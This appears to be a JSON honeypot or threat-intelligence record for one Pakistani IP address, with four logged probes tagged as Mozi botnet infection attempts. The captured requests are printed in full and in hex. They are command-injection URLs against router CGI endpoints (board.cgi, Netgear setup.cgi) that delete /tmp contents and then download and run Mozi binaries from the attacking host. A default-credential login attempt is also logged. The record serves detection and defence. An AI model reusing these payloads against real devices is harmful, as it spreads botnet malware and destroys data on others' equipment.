{"ip":"144.48.130.215","total_events":4,"verdict":{"verdict":"probing","label":"Low-level probing","detail":null,"confidence":"low","network_type":"nsp"},"first_seen":"2026-05-15T21:53:11","last_seen":"2026-06-12T13:44:25","events_24h":0,"events_7d":0,"geo":{"country_code":"PK","country_name":"Pakistan","region":"Sindh","city":"Karachi","lat":24.8591,"lon":66.9983,"asn":9541,"org":"Cyber Internet Services Pvt Ltd."},"source_domain":null,"known_scanners":[],"scanner_tag":{"key":"peeringdb:as9541","label":"Cyber Internet Services","category":"isp","url":"https://www.peeringdb.com/asn/9541"},"cve_matches":[],"top_ports":[{"port":80,"proto":"tcp","label":"HTTP","count":3},{"port":8080,"proto":"tcp","label":"HTTP-alt","count":1}],"fingerprints":{"ssh_hassh":[],"tls_ja4":[],"tls_ja3":[],"ja4h":["ge10nn0000_000000000000"]},"fingerprint_peers":{"ge10nn0000_000000000000":2177},"user_agents":[],"timeline":[{"date":"2026-05-15","count":2},{"date":"2026-05-26","count":1},{"date":"2026-06-12","count":1}],"recent_events":[{"timestamp":"2026-06-12T13:44:25","port":8080,"proto":"tcp","app_proto":"","app_protocol":"http","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://144.48.130.215:51670/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron","payload_hex":"474554202f626f6172642e6367693f636d643d63642b2f746d703b726d2b2d72662b2a3b776765742b687474703a2f2f3134342e34382e3133302e3231353a35313637302f4d6f7a692e613b63686d6f642b3737372b4d6f7a692e613b2f746d702f4d6f7a692e612b76617263726f6e","method":"","user_agent":"","community_id":"1:OpT8MyJk3UsVPKmKblJ1KCnJCTg=","ja3":"","session":"40a27bec-2fbc-4889-b443-b38933aa4eac","seq":1,"duration_ms":100,"bytes_in":112,"bytes_out":79,"enriched":{"digest":"08bb708353966421","label":"HTTP","strings":["GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://144.48.130.215:51670/Mozi.a;chmo…"],"iocs":{"urls":["http://144.48.130.215:51670/Mozi.a;chmo…"],"ips":["144.48.130.215"]}}},{"timestamp":"2026-05-26T06:09:23","port":80,"proto":"tcp","app_proto":"","app_protocol":"http","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://144.48.130.215:54515/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1","summary":"","payload_hex":"474554202f73657475702e6367693f6e6578745f66696c653d6e6574676561722e63666726746f646f3d737973636d6426636d643d726d2b2d72662b2f746d702f2a3b776765742b687474703a2f2f3134342e34382e3133302e3231353a35343531352f4d6f7a692e6d2b2d4f2b2f746d702f6e6574676561723b73682b6e65746765617226637572706174683d2f2663757272656e7473657474696e672e68746d3d3120485454502f312e300d0a0d0a","method":"GET","user_agent":"","community_id":"1:YpzAyFvnuIm8rpQ2fC2rPqmYLkU=","ja3":"","session":"c5f4596a-f87a-44bb-9322-b0de34c7bf31","seq":0,"duration_ms":0,"bytes_in":0,"bytes_out":0},{"timestamp":"2026-05-15T21:53:11","port":80,"proto":"tcp","app_proto":"","app_protocol":"","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Netlink.m;chmod%20777%20/tmp/Netlink.m;/tmp/Netlink.m&waninf=1_INTERNET_R_VID_154 HTTP/1.0\r\n\r\n","payload_hex":"3230687474703a2f2f25733a25642f4d6f7a692e6d2532302d4f2532302d3e2532302f746d702f4e65746c696e6b2e6d3b63686d6f642532303737372532302f746d702f4e65746c696e6b2e6d3b2f746d702f4e65746c696e6b2e6d2677616e696e663d315f494e5445524e45545f525f5649445f31353420485454502f312e300d0a0d0a","method":"","user_agent":"","community_id":"1:PZR79pz3IkYd91BLWaEBQYfndSs=","ja3":"","session":"4925f660-40b4-4e30-a370-cdbeadb14d45","seq":0,"duration_ms":0,"bytes_in":0,"bytes_out":0,"enriched":{"digest":"69dda84fbae568b6","strings":["20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Netlink.m;chmod%20777%20/tmp/Netlink.m;/t…"],"iocs":{"urls":["http://%s:%d/Mozi.m%20-O%20-"],"paths":["/tmp/Netlink.m"]}}},{"timestamp":"2026-05-15T21:53:11","port":80,"proto":"tcp","app_proto":"","app_protocol":"http","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/boaform/admin/formLogin?username=user&psd=user","summary":"","payload_hex":"474554202f626f61666f726d2f61646d696e2f666f726d4c6f67696e3f757365726e616d653d75736572267073643d7573657220485454502f312e300d0a0d0a","method":"GET","user_agent":"","community_id":"1:PZR79pz3IkYd91BLWaEBQYfndSs=","ja3":"","session":"4925f660-40b4-4e30-a370-cdbeadb14d45","seq":0,"duration_ms":0,"bytes_in":0,"bytes_out":0}],"http_methods":[{"method":"GET","count":2}],"distinct_ports_total":2,"top_paths":[{"path":"/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://144.48.130.215:54515/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1","count":1,"ports":1},{"path":"/boaform/admin/formLogin?username=user&psd=user","count":1,"ports":1}],"distinct_paths_total":2,"top_snis":[],"top_hosts":[],"top_alpns":[],"banners":[],"credentials":[],"header_profile":null,"tags":[{"tag_id":"Mozi Botnet Infection Attempt","tag_type":"malware","title":"Mozi Botnet Infection Attempt","severity":"CRITICAL","actively_exploited":false,"match_field":"url_path","matched_pattern":"Mozi.m","reference_urls":[]}],"data_as_of":"2026-06-20T10:55:51.314182+00:00"}